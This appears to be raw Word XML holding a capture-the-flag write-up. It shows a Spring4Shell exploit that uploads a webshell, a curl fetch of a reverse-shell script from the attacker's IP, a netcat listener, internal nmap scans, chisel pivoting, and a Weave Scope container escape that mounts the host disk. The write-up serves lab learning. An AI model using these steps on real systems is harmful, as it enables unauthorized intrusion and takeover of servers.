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SPRING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tidc7yafyj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ax02fw6svpbn"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578100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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z3v1dphrv5rg"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gr3jg8axjmn0"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kspdq1j9cti"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11">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8080 - HTTP</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website on port 80, we only have a template — a completely static site.</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6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focus on port 8080. When accessing it, we get a 404 error page. Generally, this error format is typical of an application built with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot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6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it did not find an index, we can perform file fuzzing. I will be using the tool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5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fuzzing, we found a route for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/test</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57500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Recently, a CVE was released regarding a vulnerability in the Spring Framework (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-22965</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring4Shell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(Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses a data binding functionality to bind data stored in an HTTP request to specific application objects. The bug exists in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getCachedIntrospectionResults</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, which can be used to gain unauthorized access to such objects by passing their class names through an HTTP request. This creates risks of data leakage and remote code execution when special object classes are used.</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more information, access the link below:</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https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/</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what it is about, we can use the exploit below, which basically uploads a webshell:</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/lunasec-io/Spring4Shell-POC</w:t>
        </w:r>
      </w:hyperlink>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we can execute it:</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exploit.py --url http://$ip:8080/test --file shell</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5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it uploads the webshell, we can execute commands remotely on the server.</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5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now is to obtain a reverse shell:</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 to host our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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will use curl to make a request to our IP, retrieving our payload and saving it in the root directory of the server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$ip/shell.sh -o /shell.sh</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netcat to listen on port 4444 so we can receive the reverse connection. Now we can execute our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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we receive our shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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kdscpjtue9e4" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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5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root directory →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can find our first flag.</w:t>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72"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first flag, we can start enumerating. Knowing that we are inside Docker, we can enumerate the network looking for possible new hosts.</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6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server does not have nmap, we can download a static nmap binary and then upload it to the server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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static-binaries/nmap at master · andrew-d/static-binaries</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Various *nix tools built as statically-linked binaries</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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6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60"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begin enumerating the Docker network:</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./nmap -sn 172.17.0.0-255</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5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the Docker gateway IP → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and another host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.2</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perform a port scan on it:</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./nmap -p- 172.17.0.2 --min-rate 5000</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port 4040 open. We can make a request to it using curl to see if it is a web application:</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172.17.0.2:4040</w:t>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4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making the request, we can see that it is a web application → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Weave Scope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tool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 to perform pivoting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">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7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68"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chisel on the server, we can execute the following commands:</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server -p 9000 --reverse</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63"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server:</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R:4040:172.17.0.2:4040</w:t>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70"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What we basically did was forward port 4040 from host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.2</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our localhost, so we can access the application in our browser.</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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Weave Scope is a visualization and monitoring tool for Docker and Kubernetes. It provides a top-down view of your application as well as your entire infrastructure and allows you to diagnose any issues with your distributed containerized application in real time as it is deployed to a cloud provider.</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default, Weave Scope needs to run in a privileged Docker container. Knowing this, we can mount the main system disk inside the Weave Scope Docker container.</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clicking on the circle, we can spawn the container’s terminal.</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57600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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spawning the terminal, we can execute the following commands:</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let’s list the partitions:</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df -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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mount /dev/xvda1 /mnt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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mounting the host disk at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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can access it and retrieve our final flag.</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7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C">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9"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D">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21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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Spring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20.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26.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/n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9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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jpillora/chisel" TargetMode="Externa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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lunasec-io/Spring4Shell-POC" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.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YCI5vDKdTRTrvpMv0Nirr7YcA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjN0aWRjN3lhZnlqYTIOaC5heDAyZnc2c3ZwYm4yDmguejN2MWRwaHJ2NXJnMg5oLmdyM2pnOGF4am1uMDIOaC5ua3NwZHExajljdGkyDmgua2RzY3BqdHVlOWU0Mg5oLjE3NWY1Y3M5NHowbzgAciExV2o2UHZZc1JfdHVGTk93ZWlwSUQzUldEaWxPeXlUQ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